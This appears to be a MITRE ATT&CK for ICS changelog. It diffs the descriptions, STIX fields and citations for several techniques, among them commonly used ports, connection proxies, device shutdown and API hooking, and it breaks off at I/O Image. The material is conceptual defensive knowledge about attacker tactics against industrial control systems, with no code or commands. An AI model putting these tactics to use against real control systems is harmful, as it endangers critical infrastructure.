external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0807https://attack.mitre.org/techniques/T0807
external_references[1]['source_name']EAttack Command-Line InterfaceEnterprise ATT&CK January 2018
external_references[1]['description']Enterprise ATT&CK. (2018, January 11). Command-Line Interface. Retrieved May 17, 2018.Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17

[T0885] Commonly Used Port

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may communicate over a commonly used port to bypt1Adversaries may communicate over a commonly used port to byp
>ass firewalls or network detection systems and to blend in w>ass firewalls or network detection systems and to blend in w
>ith normal network activity, to avoid more detailed inspecti>ith normal network activity, to avoid more detailed inspecti
>on. They may use the protocol associated with the port, or a>on. They may use the protocol associated with the port, or a
> completely different protocol. They may use commonly open p> completely different protocol. They may use commonly open p
>orts, such as the examples provided below. * TCP:80 (HTTP) *>orts, such as the examples provided below.     * TCP:80 (HTT
> TCP:443 (HTTPS) * TCP/UDP:53 (DNS) * TCP:1024-4999 (OPC on >P)   * TCP:443 (HTTPS)   * TCP/UDP:53 (DNS)   * TCP:1024-499
>XP/Win2k3) * TCP:49152-65535 (OPC on Vista and later) * TCP:>9 (OPC on XP/Win2k3)   * TCP:49152-65535 (OPC on Vista and l
>23 (TELNET) * UDP:161 (SNMP) * TCP:502 (MODBUS) * TCP:102 (S>ater)   * TCP:23 (TELNET)   * UDP:161 (SNMP)   * TCP:502 (MO
>7comm/ISO-TSAP) * TCP:20000 (DNP3) * TCP:44818 (Ethernet/IP)>DBUS)   * TCP:102 (S7comm/ISO-TSAP)   * TCP:20000 (DNP3)   *
>  Contributors: Matan Dobrushin - Otorio> TCP:44818 (Ethernet/IP)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-09-27 18:49:25.201000+00:00
descriptionAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. * TCP:80 (HTTP) * TCP:443 (HTTPS) * TCP/UDP:53 (DNS) * TCP:1024-4999 (OPC on XP/Win2k3) * TCP:49152-65535 (OPC on Vista and later) * TCP:23 (TELNET) * UDP:161 (SNMP) * TCP:502 (MODBUS) * TCP:102 (S7comm/ISO-TSAP) * TCP:20000 (DNP3) * TCP:44818 (Ethernet/IP) Contributors: Matan Dobrushin - OtorioAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. * TCP:80 (HTTP) * TCP:443 (HTTPS) * TCP/UDP:53 (DNS) * TCP:1024-4999 (OPC on XP/Win2k3) * TCP:49152-65535 (OPC on Vista and later) * TCP:23 (TELNET) * UDP:161 (SNMP) * TCP:502 (MODBUS) * TCP:102 (S7comm/ISO-TSAP) * TCP:20000 (DNP3) * TCP:44818 (Ethernet/IP)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0885https://attack.mitre.org/techniques/T0885

[T0884] Connection Proxy

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may use a connection proxy to direct network trat1Adversaries may use a connection proxy to direct network tra
>ffic between systems or act as an intermediary for network c>ffic between systems or act as an intermediary for network c
>ommunications.  The definition of a proxy can also be expand>ommunications.  The definition of a proxy can also be expand
>ed to encompass trust relationships between networks in peer>ed to encompass trust relationships between networks in peer
>-to-peer, mesh, or trusted connections between networks cons>-to-peer, mesh, or trusted connections between networks cons
>isting of hosts or systems that regularly communicate with e>isting of hosts or systems that regularly communicate with e
>ach other.  The network may be within a single organization >ach other.  The network may be within a single organization 
>or across multiple organizations with trust relationships. A>or across multiple organizations with trust relationships. A
>dversaries could use these types of relationships to manage >dversaries could use these types of relationships to manage 
>command and control communications, to reduce the number of >command and control communications, to reduce the number of 
>simultaneous outbound network connections, to provide resili>simultaneous outbound network connections, to provide resili
>ency in the face of connection loss, or to ride over existin>ency in the face of connection loss, or to ride over existin
>g trusted communications paths between victims to avoid susp>g trusted communications paths between victims to avoid susp
>icion. (Citation: EAttack Connection Proxy)  Detection: Proc>icion. (Citation: Enterprise ATT&CK January 2018)
>esses utilizing the network that do not normally have networ 
>k communication or have never been seen before are suspiciou 
>s. Network activities disassociated from user-driven actions 
> from processes that normally require user direction are sus 
>picious.  Analyze network data for uncommon data flows (e.g. 
>, a client sending significantly more data than it receives  
>from a server or between clients that should not or often do 
> not communicate with one another). Processes utilizing the  
>network that do not normally have network communication or h 
>ave never been seen before are suspicious. Analyze packet co 
>ntents to detect communications that do not follow the expec 
>ted protocol behavior for the port that is being used. (Cita 
>tion: University of Birmingham C2) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-10-20 21:01:00.402000+00:00
descriptionAdversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. The definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. The network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: EAttack Connection Proxy) Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. The definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. The network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: Enterprise ATT&CK January 2018)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0884https://attack.mitre.org/techniques/T0884
external_references[1]['source_name']EAttack Connection ProxyEnterprise ATT&CK January 2018
external_references[1]['description']Enterprise ATT&CK. (2018, January 11). Connection Proxy. Retrieved May 17, 2018.Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'University of Birmingham C2', 'description': 'Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', 'url': 'https://www.cpni.gov.uk/Documents/Publications/2014/2014-04-23-c2-report-birmingham.pdf'}

[T0811] Data from Information Repositories

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may target and collect data from information rept1Adversaries may target and collect data from information rep
>ositories. This can include sensitive data such as specifica>ositories. This can include sensitive data such as specifica
>tions, schematics, or diagrams of control system layouts, de>tions, schematics, or diagrams of control system layouts, de
>vices, and processes. Examples of information repositories i>vices, and processes. Examples of information repositories i
>nclude reference databases or local machines in the process >nclude reference databases or local machines in the process 
>environment, as well as workstations and databases in the co>environment, as well as workstations and databases in the co
>rporate network that might contain information about the ICS>rporate network that might contain information about the ICS
>. Information collected from these systems may provide the a>.(Citation: Cybersecurity & Infrastructure Security Agency M
>dversary with a better understanding of the operational envi>arch 2018)  Information collected from these systems may pro
>ronment, vendors used, processes, or procedures of the ICS. >vide the adversary with a better understanding of the operat
>In a campaign between 2011 and 2013 against ONG organization>ional environment, vendors used, processes, or procedures of
>s, Chinese state-sponsored actors searched document reposito> the ICS.  In a campaign between 2011 and 2013 against ONG o
>ries for specific information such as, system manuals, remot>rganizations, Chinese state-sponsored actors searched docume
>e terminal unit (RTU) sites, personnel lists, documents that>nt repositories for specific information such as, system man
> included the string SCAD*”, user credentials, and remote d>uals, remote terminal unit (RTU) sites, personnel lists, doc
>ial-up access information.(Citation: CISA Chinese Gas Pipeli>uments that included the string SCAD*, user credentials, and
>ne Intrusion 2011 - 2013 July 2021)> remote dial-up access information. (Citation: CISA AA21-201
 >A Pipeline Intrusion July 2021)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 18:05:21.731000+00:00
descriptionAdversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS. Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string “SCAD*”, user credentials, and remote dial-up access information.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018) Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0811https://attack.mitre.org/techniques/T0811
external_references[1]['source_name']CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021Cybersecurity & Infrastructure Security Agency March 2018
external_references[1]['description']ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11
external_references[1]['url']https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdfhttps://us-cert.cisa.gov/ncas/alerts/TA18-074A
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA AA21-201A Pipeline Intrusion July 2021', 'description': 'Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ', 'url': 'https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf'}

[T0816] Device Restart/Shutdown

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may forcibly restart or shutdown a device in an t1Adversaries may forcibly restart or shutdown a device in an 
>ICS environment to disrupt and potentially negatively impact>ICS environment to disrupt and potentially negatively impact
> physical processes. Methods of device restart and shutdown > physical processes. Methods of device restart and shutdown 
>exist in some devices as built-in, standard functionalities.>exist in some devices as built-in, standard functionalities.
> These functionalities can be executed using interactive dev> These functionalities can be executed using interactive dev
>ice web interfaces, CLIs, and network protocol commands. Une>ice web interfaces, CLIs, and network protocol commands.  Un
>xpected restart or shutdown of control system devices may pr>expected restart or shutdown of control system devices may p
>event expected response functions happening during critical >revent expected response functions happening during critical
>states. A device restart can also be a sign of malicious dev> states.  A device restart can also be a sign of malicious d
>ice modifications, as many updates require a shutdown in ord>evice modifications, as many updates require a shutdown in o
>er to take effect.>rder to take effect.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 16:50:56.401000+00:00
descriptionAdversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands. Unexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states. A device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands. Unexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states. A device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0816https://attack.mitre.org/techniques/T0816
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Research - Research - Taxonomy Cyber Attacks on SCADA', 'description': 'Bonnie Zhu, Anthony Joseph, Shankar Sastry. (2011). A Taxonomy of Cyber Attacks on SCADA Systems. Retrieved January 12, 2018.', 'url': 'http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258'}
external_references{'source_name': 'Ukraine15 - EISAC - 201603', 'description': 'Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.', 'url': 'https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdf'}

[T0871] Execution through API

Current version: 1.1

Version changed from: 0.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 15:32:03.427000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0871https://attack.mitre.org/techniques/T0871

[T0820] Exploitation for Evasion

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may exploit a software vulnerability to take advt1Adversaries may exploit a software vulnerability to take adv
>antage of a programming error in a program, service, or with>antage of a programming error in a program, service, or with
>in the operating system software or kernel itself to evade d>in the operating system software or kernel itself to evade d
>etection. Vulnerabilities may exist in software that can be >etection. Vulnerabilities may exist in software that can be 
>used to disable or circumvent security features.  Adversarie>used to disable or circumvent security features.    Adversar
>s may have prior knowledge through <span class="smw-format l>ies may have prior knowledge through [Remote System Informat
>ist-format "><span class="smw-row"><span class="smw-field"><>ion Discovery](https://attack.mitre.org/techniques/T0888) ab
>span class="smw-value">Control Device Identification</span><>out security features implemented on control devices. These 
>/span></span></span> about security features implemented on >device security features will likely be targeted directly fo
>control devices. These device security features will likely >r exploitation. There are examples of firmware RAM/ROM consi
>be targeted directly for exploitation. There are examples of>stency checks on control devices being targeted by adversari
> firmware RAM/ROM consistency checks on control devices bein>es to enable the installation of malicious [System Firmware]
>g targeted by adversaries to enable the installation of mali>(https://attack.mitre.org/techniques/T0857).
>cious System Firmware 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-30 15:28:37.716000+00:00
descriptionAdversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. Adversaries may have prior knowledge through Control Device Identification about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious System FirmwareAdversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. Adversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0820https://attack.mitre.org/techniques/T0820

[T0890] Exploitation for Privilege Escalation

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may exploit software vulnerabilities in an attemt1Adversaries may exploit software vulnerabilities in an attem
>pt to elevate privileges. Exploitation of a software vulnera>pt to elevate privileges. Exploitation of a software vulnera
>bility occurs when an adversary takes advantage of a program>bility occurs when an adversary takes advantage of a program
>ming error in a program, service, or within the operating sy>ming error in a program, service, or within the operating sy
>stem software or kernel itself to execute adversary-controll>stem software or kernel itself to execute adversary-controll
>ed code. Security constructs such as permission levels will >ed code. Security constructs such as permission levels will 
>often hinder access to information and use of certain techni>often hinder access to information and use of certain techni
>ques, so adversaries will likely need to perform privilege e>ques, so adversaries will likely need to perform privilege e
>scalation to include use of software exploitation to circumv>scalation to include use of software exploitation to circumv
>ent those restrictions. When initially gaining access to a s>ent those restrictions. (Citation: The MITRE Corporation)   
>ystem, an adversary may be operating within a lower privileg>When initially gaining access to a system, an adversary may 
>ed process which will prevent them from accessing certain re>be operating within a lower privileged process which will pr
>sources on the system. Vulnerabilities may exist, usually in>event them from accessing certain resources on the system. V
> operating system components and software commonly running a>ulnerabilities may exist, usually in operating system compon
>t higher permissions, that can be exploited to gain higher l>ents and software commonly running at higher permissions, th
>evels of access on the system. This could enable someone to >at can be exploited to gain higher levels of access on the s
>move from unprivileged or user level permissions to SYSTEM o>ystem. This could enable someone to move from unprivileged o
>r root permissions depending on the component that is vulner>r user level permissions to SYSTEM or root permissions depen
>able. This may be a necessary step for an adversary compromi>ding on the component that is vulnerable. This may be a nece
>sing an endpoint system that has been properly configured an>ssary step for an adversary compromising an endpoint system 
>d limits other privilege escalation methods.>that has been properly configured and limits other privilege
 > escalation methods. (Citation: The MITRE Corporation)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 16:38:58.028000+00:00
descriptionAdversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. (Citation: The MITRE Corporation)
kill_chain_phases[0]['phase_name']privilege-escalation-icsprivilege-escalation
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0890https://attack.mitre.org/techniques/T0890
external_references[1]['source_name']ATT&CK Exploitation for Privilege EscalationThe MITRE Corporation
external_references[1]['description']The MITRE Corporation. (n.d.). ATT&CK T1068: Exploitation for Privilege Escalation. Retrieved April 12, 2021.The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12

[T0823] Graphical User Interface

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to gain access to a machine via a Grt1Adversaries may attempt to gain access to a machine via a Gr
>aphical User Interface (GUI) to enhance execution capabiliti>aphical User Interface (GUI) to enhance execution capabiliti
>es. Access to a GUI allows a user to interact with a compute>es. Access to a GUI allows a user to interact with a compute
>r in a more visual manner than a CLI. A GUI allows users to >r in a more visual manner than a CLI. A GUI allows users to 
>move a cursor and click on interface objects, with a mouse a>move a cursor and click on interface objects, with a mouse a
>nd keyboard as the main input devices, as opposed to just us>nd keyboard as the main input devices, as opposed to just us
>ing the keyboard. If physical access is not an option, then >ing the keyboard.  If physical access is not an option, then
>access might be possible via protocols such as VNC on Linux-> access might be possible via protocols such as VNC on Linux
>based and Unix-based operating systems, and RDP on Windows o>-based and Unix-based operating systems, and RDP on Windows 
>perating systems. An adversary can use this access to execut>operating systems. An adversary can use this access to execu
>e programs and applications on the target machine.  In the O>te programs and applications on the target machine.
>ldsmar water treatment attack, adversaries utilized the oper 
>ator HMI interface through the graphical user interface. Thi 
>s action led to immediate operator detection as they were ab 
>le to see the adversary making changes on their screen. (Cit 
>ation: Oldsmar Water Treatment Attack Feb 2021) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:25:32.143000+00:002022-09-30 15:02:29.881000+00:00
descriptionAdversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine. In the Oldsmar water treatment attack, adversaries utilized the operator HMI interface through the graphical user interface. This action led to immediate operator detection as they were able to see the adversary making changes on their screen. (Citation: Oldsmar Water Treatment Attack Feb 2021)Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0823https://attack.mitre.org/techniques/T0823
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Ukraine15 - EISAC - 201603', 'description': 'Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.', 'url': 'https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdf'}
external_references{'source_name': 'Oldsmar Water Treatment Attack Feb 2021', 'description': 'Pinellas County Sheriff’s Office. (2021, February 8). Treatment Plant Intrusion Press Conference. Retrieved October 8, 2021.', 'url': 'https://www.youtube.com/watch?v=MkXDSOgLQ6M'}

[T0874] Hooking

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may hook into application programming interface t1Adversaries may hook into application programming interface 
>(API) functions used by processes to redirect calls for pers>(API) functions used by processes to redirect calls for exec
>istent means. Windows processes often leverage these API fun>ution and privilege escalation means. Windows processes ofte
>ctions to perform tasks that require reusable system resourc>n leverage these API functions to perform tasks that require
>es. Windows API functions are typically stored in dynamic-li> reusable system resources. Windows API functions are typica
>nk libraries (DLLs) as exported functions. (Citation: EAttac>lly stored in dynamic-link libraries (DLLs) as exported func
>k Hooking)  One type of hooking seen in ICS involves redirec>tions. (Citation: Enterprise ATT&CK)  One type of hooking se
>ting calls to these functions via import address table (IAT)>en in ICS involves redirecting calls to these functions via 
> hooking. IAT hooking uses modifications to a process’s IAT,>import address table (IAT) hooking. IAT hooking uses modific
> where pointers to imported API functions are stored. (Citat>ations to a processs IAT, where pointers to imported API fun
>ion: Stuxnet - Symantec - 201102)>ctions are stored. (Citation: Nicolas Falliere, Liam O Murch
 >u, Eric Chien February 2011)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 15:40:42.017000+00:00
descriptionAdversaries may hook into application programming interface (API) functions used by processes to redirect calls for persistent means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: EAttack Hooking) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Stuxnet - Symantec - 201102)Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a processs IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
kill_chain_phases[1]['phase_name']privilege-escalation-icsprivilege-escalation
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0874https://attack.mitre.org/techniques/T0874
external_references[1]['source_name']EAttack HookingEnterprise ATT&CK
external_references[1]['description']Enterprise ATT&CK. (n.d.). Hooking. Retrieved October 27, 2019.Enterprise ATT&CK Hooking Retrieved. 2019/10/27
external_references[2]['source_name']Stuxnet - Symantec - 201102Nicolas Falliere, Liam O Murchu, Eric Chien February 2011
external_references[2]['description']Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
external_references[2]['url']https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdfhttps://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf

[T0877] I/O Image

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
